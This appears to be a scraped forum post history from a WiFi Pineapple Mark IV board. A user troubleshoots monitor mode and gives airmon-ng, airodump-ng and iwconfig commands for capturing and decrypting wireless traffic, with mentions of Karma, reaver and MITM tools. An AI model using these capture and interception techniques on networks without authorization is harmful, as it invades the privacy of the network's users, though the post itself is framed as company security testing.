JohnnyBoy
-
Posts
5 -
Joined
-
Last visited
Posts posted by JohnnyBoy
-
-
You got it all mixed up. Why the f are you trying to airodump on a pineapple? You could just do that on your laptop with the built in wifi card. You are making it too complicated. The pineapple is for MITM'ing people, not using as a super complicated passive sniffer.
You are right, in a sense...
Why use the pineapple for anything else wifi related when I could just plug in a wifi usb card to my android phone and use it for everything?
Then it would be why do that when I could modify the wifi driver (because I am a programmer ) to accept monitor mode?
Laptop, no, that is ten times the size.
I bought the pineapple to do before any of that because it is popular and I wanted to see how it was done right before experimenting.
But, it has a nice form factor, does a lot of things right, and it is fun to play with openwrt.
Airodump only takes one command, btw. If started in monitor mode.
You can run reaver, airodump, everything right there from the box and do all the mitm stuff my phone can do, but more reliably,
and in my case with a much bigger antenna.
-
It's not all about MITM though, with the greatest fruit of them all you can do amazing security stuff, MITM or not.
-Foxtrot
Yep. And more, it is a nice little openwrt box.
-
I am able to get that to work:
iwconfig wlan0 key 'xxxxx' mode managed essid 'nameofap' ap 11:11:11:11:11:11 channel 1
For instance. Take down the interface before the above command, bring it up afterwards, then
let airodump-ng go: airodump-ng -w /usb/filename wlan0
When you connect to an encrypted AP you are going to need to get the four way handshake
for decrypting it afterwards. It will be encrypted in your pcap file. Use wireshark on your android/pc/etc
and google wireshark decryption for explicit instructions.
There is good documentation for it. One tip: enable the wifi bar so you don't have to search the
options interface everytime.
On capturing traffic: I am experimenting with this myself. I am finding with a basic 5db or 10db omnidirectional
antenna the results are "meh". My theory is that this is because the APs have much more txpower then
the clients (gaming systems, computers, wifi phones, etc).
I am a little lost as to why doesn't everyone just use the system in monitor mode, why even have jasager/karma,
but the results I have heard from karma are excellent(for instance, in malls, see ars techica article on mobile bugs good
article pimping the pineapple from Dan Kukyendall of NTO Objectives).... versus the results I see from monitor
mode are "meh".
Theoretically, you should be able to get enough bad traffic, if it is not SSL encrypted, if you keep it on open
networks for awhile to say "this network should not be open".
In practice, I am finding that not to be the case, myself, but I am a noob at this. (I am an ancient and professional
sec guy, just have not worked with wifi before much.)
-
Hey, I am unable to get monitor mode going in 2.8 unless I change etc config wireless to have wlan0 start in monitor mode.
All of the old ways to do this does not seem to work anyway. Pre-2.8 I was able to get it going, where wlan0 would stay in Master mode while mon0 would channel skip and get all traffic.
To keep this post brief, i tried about every "what should work method", and tried them all prefacing with killall hostapd before them, rebooting after every try just to make sure.
for instance, the below methods do not work, they channel skip correctly, but nothing comes up. And the card is working, as I test this against it in monitor mode at start up.But I tried many other possibilities as well.
1.killall hostapdifconfig wlan0 downifconfig wlan0 upairmon-ng start wlan0airodump-ng mon0NO... does not work...2.killall hostapdifconfig wlan0 downairmon-ng start wlan0airodump-ng mon0basically keep wlan0 downNO...now try:[stop the wireless service in the GUI before continuing for 2.7.0+]airmon-ng start wlan0airodump-ng mon0NOcatches nothing....5.killall hostapdifconfig wlan0 downiwconfig wlan0 mode monitorifconfig wlan0 upairodump-ng wlan0nothing....I also tried iterations of all of the above without killall hostapd.On 2.7 I did not have this written down, but think it was simply
ifconfig wlan0 downairmon-ng start wlan0ifconfig wlan0 upairodump-ng wlan0Or something like that.Any advice or what works for you would be appreciated.Even if "this works for me".....I do have some custom setups... nothing that should effect this,but some which possibly could.(Karma is off, ap is running encryption and not broadcasting,web folder is in usb... )(Basically, my goal is to have this going, plugged into battery
pack with my android wireless going into it and no commandethernet port being used so I can better walk around and getreadings and perform tests for my company's network security.)
Sniffing open networks
in WiFi Pineapple Mark IV
Posted
....
The pineapple can do much more then just jasager/karma.
The pineapple clearly can do much more then just jasager (modified karma).
You can do every wifi pen test you need to do from it, and much more then that.
It has a far smaller form factor then your laptop, and will perform a lot better then
your android phone with a usb dongle or modified wifi driver.
Karma/Jasager is one thing you can do with it very well. But you can also run
Karma on your phone. Or take ten seconds to download and run DSploit, if
you can't figure out hacked up wifi drivers or getting backtrack on there.
You should know that karma/jasager is detectable. You do not even need to
spoof legacy SSID's to it. You can just look at your wifi device and see that all
of your legacy SSID's are there are on the network.
Gee whiz, my work AP is here in the neighborhood? How did that happen.
That is, though an useful test system.
I have, as well, the pineapple running for a good ten hours on a single battery
that is very small.
It has some cool UI features, though you should secure that.